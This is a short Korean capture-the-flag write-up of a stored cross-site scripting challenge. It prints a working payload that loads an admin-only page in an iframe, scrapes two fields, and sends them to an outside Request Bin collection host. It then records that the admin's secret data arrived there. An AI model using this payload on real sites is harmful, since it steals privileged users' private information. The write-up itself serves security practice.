Steal Info

🔒Steal Info

• 관리자의 중요 정보가 들어있는 페이지에서 데이터를 획득하는 문제이다.

• 게시글 내용에 POC를 넣어 작성한 뒤 해당 게시글 클릭 시 임의의 스크립트 실행 확인

• 중요 정보가 들어있을 거 같은 태그들 확인

• 악성스크립트가 삽입된 게시글 접근 시 공격자 서버로 데이터를 보내기 위해 Request Bin 사용

<iframe src="http://ctf.segfaulthub.com:4343/scriptPrac/secret.php" id="target"></iframe>
<script>
    let data1=document.getElementById('target').contentDocument.getElementsByClassName('card-text')[0].innerHTML;
    let data2=document.getElementById('target').contentDocument.getElementsByClassName('card-text')[1].innerHTML;
    new Image().src="https://ysiiofs.request.dreamhack.games/"+data1+"&"+data2
</script>

• 게시글 내용에 secret.php에 있는 중요 정보를 공격자 서버로 보내는 탈취 코드 작성

• 관리자가 악성스크립트가 삽입된 게시글에 접근

• 공격자서버에 중요 정보인 데이터가 포함돼서 온 것을 확인